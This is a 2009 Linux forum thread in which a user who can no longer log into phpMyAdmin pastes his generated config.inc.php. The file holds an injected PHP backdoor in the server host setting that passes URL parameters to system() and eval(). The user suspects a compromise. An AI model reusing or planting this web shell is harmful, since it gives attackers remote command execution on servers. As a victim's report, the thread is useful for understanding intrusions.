Go Back   HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials > Linux Forums > Server Operation

Do you like HowtoForge? Please consider supporting us by becoming a subscriber.
Reply
 
Thread Tools Display Modes
  #1  
Old 31st August 2009, 16:15
JimmiJames JimmiJames is offline
Member
 
Join Date: Jun 2006
Posts: 51
Thanks: 4
Thanked 0 Times in 0 Posts
Default Can't login to phpmyadmin anymore

I get this error when try to login.

Quote:
Welcome to phpMyAdmin 2.11.8.1deb5

phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.

Error
MySQL said:

#1045 - Access denied for user 'root'@'localhost' (using password: NO)


Invalid hostname for server 1. Please review your configuration.
All my debian 5.0 perfect setup machines have that problem and it started a few days ago. What's happening?
Reply With Quote
Sponsored Links
  #2  
Old 1st September 2009, 15:15
falko falko is offline
Super Moderator
 
Join Date: Apr 2005
Location: Lneburg, Germany
Posts: 41,701
Thanks: 1,900
Thanked 2,735 Times in 2,571 Posts
Default

This might help: http://www.howtoforge.com/forums/showthread.php?t=38667
__________________
Falko
--
Download the ISPConfig 3 Manual! | Check out the ISPConfig 3 Billing Module!

FB: http://www.facebook.com/howtoforge

nginx-Webhosting: Timme Hosting | Follow me on:
Reply With Quote
  #3  
Old 1st September 2009, 16:16
JimmiJames JimmiJames is offline
Member
 
Join Date: Jun 2006
Posts: 51
Thanks: 4
Thanked 0 Times in 0 Posts
 
Default

So i got in the var/lib/phpmyadmin/config.inc.php file and that's what i get...

Quote:
<?php
/*
* Generated configuration file
* Generated by: phpMyAdmin 2.11.8.1deb5 setup script by Michal iha <michal@cihar.com>
* Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $
* Date: Tue, 01 Sep 2009 13:09:46 GMT
*/

/* Servers configuration */
$i = 0;

/* Server (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';

/* End of servers configuration */

?>
What is all that code instead of localhost??? have I been hacked?
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Webmail problems with only one domain? compner Installation/Configuration 14 16th February 2010 16:59
Cannot login to phpmyadmin atjensen11 HOWTO-Related Questions 3 31st August 2009 18:07
Centos 5.2 + ISPConfig 3 tutorial - Problem with email tanakskool Server Operation 1 3rd June 2009 16:22
phpmyadmin login problem ddouma Installation/Configuration 14 20th January 2009 02:33
Unable to authenticate to SMTP server ashkev Installation/Configuration 15 6th February 2007 17:46


All times are GMT +2. The time now is 01:24.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.